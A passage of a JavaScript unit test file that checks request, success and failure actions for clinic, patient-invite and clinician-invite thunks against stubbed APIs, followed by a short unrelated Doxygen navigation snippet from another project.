} }, }, ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchPatientInvites(api, clinicId)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_PATIENT_INVITES_UNAUTHORIZED, }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.getPatientInvites.callCount).to.equal(1); }); }); /* acceptPatientInvitation thunk: REQUEST/SUCCESS and REQUEST/FAILURE (500) action sequences. */ describe('acceptPatientInvitation', () => { it('should trigger ACCEPT_PATIENT_INVITATION_SUCCESS and it should call clinics.acceptPatientInvitation once for a successful request', () => { let clinicId = 'clinicId123'; let inviteId = 'inviteIdABC'; let api = { clinics: { acceptPatientInvitation: sinon.stub().callsArgWith(2, null, {}), }, }; let expectedActions = [ { type: 'ACCEPT_PATIENT_INVITATION_REQUEST' }, { type: 'ACCEPT_PATIENT_INVITATION_SUCCESS', payload: { clinicId: 'clinicId123', inviteId: 'inviteIdABC', } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.acceptPatientInvitation(api, clinicId, inviteId)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.clinics.acceptPatientInvitation.callCount).to.equal(1); }); it('should trigger ACCEPT_PATIENT_INVITATION_FAILURE and it should call error once for a failed request', () => { let clinicId = 'clinicId123'; let inviteId = 'inviteIdABC'; let api = { clinics: { acceptPatientInvitation: sinon.stub().callsArgWith(2, {status: 500, body: 'Error!'}, null), }, }; let err = new Error(ErrorMessages.ERR_ACCEPTING_PATIENT_INVITATION); err.status = 500; let expectedActions = [ { type: 'ACCEPT_PATIENT_INVITATION_REQUEST' }, { type: 'ACCEPT_PATIENT_INVITATION_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => {
expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.acceptPatientInvitation(api, clinicId, inviteId)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_ACCEPTING_PATIENT_INVITATION }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.acceptPatientInvitation.callCount).to.equal(1); }); }); /* updatePatientPermissions thunk: REQUEST/SUCCESS and REQUEST/FAILURE (500) action sequences. */ describe('updatePatientPermissions', () => { it('should trigger UPDATE_PATIENT_PERMISSIONS_SUCCESS and it should call clinics.updatePatientPermissions once for a successful request', () => { let clinicId = 'clinicId123'; let patientId = 'patient234'; let permissions = { view: {}, upload: {}}; let api = { clinics: { updatePatientPermissions: sinon.stub().callsArgWith(3, null, permissions), }, }; let expectedActions = [ { type: 'UPDATE_PATIENT_PERMISSIONS_REQUEST' }, { type: 'UPDATE_PATIENT_PERMISSIONS_SUCCESS', payload: { clinicId, patientId, permissions } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.updatePatientPermissions(api, clinicId, patientId, permissions)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.clinics.updatePatientPermissions.callCount).to.equal(1); }); it('should trigger UPDATE_PATIENT_PERMISSIONS_FAILURE and it should call error once for a failed request', () => { let clinicId = 'clinicId123'; let patientId = 'patient234'; let permissions = { view: {}, upload: {}}; let api = { clinics: { updatePatientPermissions: sinon.stub().callsArgWith(3, {status: 500, body: 'Error!'}, null), }, }; let err = new Error(ErrorMessages.ERR_UPDATING_PATIENT_PERMISSIONS); err.status = 500; let expectedActions = [ { type: 'UPDATE_PATIENT_PERMISSIONS_REQUEST' }, { type: 'UPDATE_PATIENT_PERMISSIONS_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ];
_.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.updatePatientPermissions(api, clinicId, patientId, permissions)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_UPDATING_PATIENT_PERMISSIONS }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.updatePatientPermissions.callCount).to.equal(1); }); }); /* fetchClinicsForPatient thunk: REQUEST/SUCCESS and REQUEST/FAILURE (500) action sequences. */ describe('fetchClinicsForPatient', () => { it('should trigger FETCH_CLINICS_FOR_PATIENT_SUCCESS and it should call clinics.getClinicsForPatient once for a successful request', () => { let userId = 'user123'; let clinics = [{ patient: { id: 'user123', email: '<EMAIL>' }, clinic: { id: 'clinic234', name: 'Clinic Name' } }] let api = { clinics: { getClinicsForPatient: sinon.stub().callsArgWith(2, null, clinics), }, }; let expectedActions = [ { type: 'FETCH_CLINICS_FOR_PATIENT_REQUEST' }, { type: 'FETCH_CLINICS_FOR_PATIENT_SUCCESS', payload: { clinics } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchClinicsForPatient(api, userId)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.clinics.getClinicsForPatient.callCount).to.equal(1); }); it('should trigger FETCH_CLINICS_FOR_PATIENT_FAILURE and it should call error once for a failed request', () => { let userId = 'user123'; let api = { clinics: { getClinicsForPatient: sinon.stub().callsArgWith(2, {status: 500, body: 'Error!'}, null), }, }; let err = new Error(ErrorMessages.ERR_FETCHING_CLINICS_FOR_PATIENT); err.status = 500; let expectedActions = [ { type: 'FETCH_CLINICS_FOR_PATIENT_REQUEST' }, { type: 'FETCH_CLINICS_FOR_PATIENT_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true;
}); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchClinicsForPatient(api, userId)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_CLINICS_FOR_PATIENT }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.getClinicsForPatient.callCount).to.equal(1); }); }); /* fetchClinicianInvites thunk: REQUEST/SUCCESS and REQUEST/FAILURE (500) action sequences. */ describe('fetchClinicianInvites', () => { it('should trigger FETCH_CLINICIAN_INVITES_SUCCESS and it should call clinics.getClinicianInvites once for a successful request', () => { let userId = 'user123'; let invites = ['inviteId'] let api = { clinics: { getClinicianInvites: sinon.stub().callsArgWith(1, null, invites), }, }; let expectedActions = [ { type: 'FETCH_CLINICIAN_INVITES_REQUEST' }, { type: 'FETCH_CLINICIAN_INVITES_SUCCESS', payload: { invites } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchClinicianInvites(api, userId)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.clinics.getClinicianInvites.callCount).to.equal(1); }); it('should trigger FETCH_CLINICIAN_INVITES_FAILURE and it should call error once for a failed request', () => { let userId = 'user123'; let api = { clinics: { getClinicianInvites: sinon.stub().callsArgWith(1, {status: 500, body: 'Error!'}, null), }, }; let err = new Error(ErrorMessages.ERR_FETCHING_CLINICIAN_INVITES); err.status = 500; let expectedActions = [ { type: 'FETCH_CLINICIAN_INVITES_REQUEST' }, { type: 'FETCH_CLINICIAN_INVITES_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchClinicianInvites(api, userId)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message:
ErrorMessages.ERR_FETCHING_CLINICIAN_INVITES }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.getClinicianInvites.callCount).to.equal(1); }); }); /* acceptClinicianInvite thunk: REQUEST/SUCCESS and REQUEST/FAILURE (500) action sequences. */ describe('acceptClinicianInvite', () => { it('should trigger ACCEPT_CLINICIAN_INVITE_SUCCESS and it should call clinics.acceptClinicianInvite once for a successful request', () => { let userId = 'user123'; let inviteId = 'inviteId345'; let api = { clinics: { acceptClinicianInvite: sinon.stub().callsArgWith(2, null, {}), }, }; let expectedActions = [ { type: 'ACCEPT_CLINICIAN_INVITE_REQUEST' }, { type: 'ACCEPT_CLINICIAN_INVITE_SUCCESS', payload: { inviteId: 'inviteId345' } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.acceptClinicianInvite(api, userId, inviteId)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.clinics.acceptClinicianInvite.callCount).to.equal(1); }); it('should trigger ACCEPT_CLINICIAN_INVITE_FAILURE and it should call error once for a failed request', () => { let userId = 'user123'; let inviteId = 'inviteId345'; let api = { clinics: { acceptClinicianInvite: sinon.stub().callsArgWith(2, {status: 500, body: 'Error!'}, null), }, }; let err = new Error(ErrorMessages.ERR_ACCEPTING_CLINICIAN_INVITE); err.status = 500; let expectedActions = [ { type: 'ACCEPT_CLINICIAN_INVITE_REQUEST' }, { type: 'ACCEPT_CLINICIAN_INVITE_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.acceptClinicianInvite(api, userId, inviteId)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_ACCEPTING_CLINICIAN_INVITE }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions);
expect(api.clinics.acceptClinicianInvite.callCount).to.equal(1); }); }); /* dismissClinicianInvite thunk: REQUEST/SUCCESS and REQUEST/FAILURE (500) action sequences. */ describe('dismissClinicianInvite', () => { it('should trigger DISMISS_CLINICIAN_INVITE_SUCCESS and it should call clinics.dismissClinicianInvite once for a successful request', () => { let userId = 'user123'; let inviteId = 'inviteId345'; let api = { clinics: { dismissClinicianInvite: sinon.stub().callsArgWith(2, null, {}), }, }; let expectedActions = [ { type: 'DISMISS_CLINICIAN_INVITE_REQUEST' }, { type: 'DISMISS_CLINICIAN_INVITE_SUCCESS', payload: { inviteId: 'inviteId345' } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.dismissClinicianInvite(api, userId, inviteId)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.clinics.dismissClinicianInvite.callCount).to.equal(1); }); it('should trigger DISMISS_CLINICIAN_INVITE_FAILURE and it should call error once for a failed request', () => { let userId = 'user123'; let inviteId = 'inviteId' let api = { clinics: { dismissClinicianInvite: sinon.stub().callsArgWith(2, {status: 500, body: 'Error!'}, null), }, }; let err = new Error(ErrorMessages.ERR_DISMISSING_CLINICIAN_INVITE); err.status = 500; let expectedActions = [ { type: 'DISMISS_CLINICIAN_INVITE_REQUEST' }, { type: 'DISMISS_CLINICIAN_INVITE_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.dismissClinicianInvite(api, userId, inviteId)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_DISMISSING_CLINICIAN_INVITE }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.dismissClinicianInvite.callCount).to.equal(1); }); }); /* getClinicsForClinician thunk: REQUEST/SUCCESS and REQUEST/FAILURE (500) action sequences. */ describe('getClinicsForClinician', () => { it('should
trigger GET_CLINICS_FOR_CLINICIAN_SUCCESS and it should call clinics.getClinicsForClinician once for a successful request', () => { let clinicianId = 'clinicianId1'; let clinics = [ { id: '5f85fbe6686e6bb9170ab5d0', address: '1 Address Ln, City Zip', name: 'Clinic1', phoneNumbers: [{ number: '(888) 555-5555', type: 'Office' }], }, ]; let api = { clinics: { getClinicsForClinician: sinon.stub().callsArgWith(2, null, clinics), }, }; let expectedActions = [ { type: 'GET_CLINICS_FOR_CLINICIAN_REQUEST' }, { type: 'GET_CLINICS_FOR_CLINICIAN_SUCCESS', payload: { clinicianId: 'clinicianId1', clinics } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.getClinicsForClinician(api, clinicianId)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.clinics.getClinicsForClinician.callCount).to.equal(1); }); it('should trigger GET_CLINICS_FOR_CLINICIAN_FAILURE and it should call error once for a failed request', () => { let clinicianId = 'clinicianId1'; let api = { clinics: { getClinicsForClinician: sinon.stub().callsArgWith(2, {status: 500, body: 'Error!'}, null), }, }; let err = new Error(ErrorMessages.ERR_FETCHING_CLINICS_FOR_CLINICIAN); err.status = 500; let expectedActions = [ { type: 'GET_CLINICS_FOR_CLINICIAN_REQUEST' }, { type: 'GET_CLINICS_FOR_CLINICIAN_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.getClinicsForClinician(api, clinicianId)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_CLINICS_FOR_CLINICIAN }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.getClinicsForClinician.callCount).to.equal(1); }); });
/* triggerInitialClinicMigration thunk: REQUEST/SUCCESS and REQUEST/FAILURE (500) action sequences. The trailing closers belong to enclosing describe blocks opened earlier in the file. */ describe('triggerInitialClinicMigration', () => { it('should trigger TRIGGER_INITIAL_CLINIC_MIGRATION_SUCCESS and it should call clinics.triggerInitialClinicMigration once for a successful request', () => { let clinicId = 'clinicId1'; let userId = 'userId1'; let api = { clinics: { triggerInitialClinicMigration: sinon.stub().callsArgWith(1, null, { userId }), }, }; let expectedActions = [ { type: 'TRIGGER_INITIAL_CLINIC_MIGRATION_REQUEST' }, { type: 'TRIGGER_INITIAL_CLINIC_MIGRATION_SUCCESS', payload: { clinicId: 'clinicId1' } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.triggerInitialClinicMigration(api, clinicId)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.clinics.triggerInitialClinicMigration.callCount).to.equal(1); }); it('should trigger TRIGGER_INITIAL_CLINIC_MIGRATION_FAILURE and it should call error once for a failed request', () => { let clinicId = 'clinicId1'; let api = { clinics: { triggerInitialClinicMigration: sinon.stub().callsArgWith(1, {status: 500, body: 'Error!'}, null), }, }; let err = new Error(ErrorMessages.ERR_TRIGGERING_INITIAL_CLINIC_MIGRATION); err.status = 500; let expectedActions = [ { type: 'TRIGGER_INITIAL_CLINIC_MIGRATION_REQUEST' }, { type: 'TRIGGER_INITIAL_CLINIC_MIGRATION_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.triggerInitialClinicMigration(api, clinicId)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_TRIGGERING_INITIAL_CLINIC_MIGRATION }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.triggerInitialClinicMigration.callCount).to.equal(1); }); }); }); });
paulreimer/makerlabs-acm
docs/hid__global__tag__id_8h.js
/* Auto-generated Doxygen navigation data for hid_global_tag_id.h (entries: [display name, target html, member page]). NOTE(review): this appears to belong to a different project (makerlabs-acm docs) and may have been appended to this file by mistake — confirm. */ var hid__global__tag__id_8h = [ [ "TagFormatView", "struct_h_i_d_global_tag_i_d_1_1_tag_format_view.html", "struct_h_i_d_global_tag_i_d_1_1_tag_format_view" ], [ "ParityView", "struct_h_i_d_global_tag_i_d_1_1_parity_view.html", "struct_h_i_d_global_tag_i_d_1_1_parity_view" ], [ "operator==", "group__firmware.html#gaf24480ac916188ffb4d86cfff7735260", null ] ];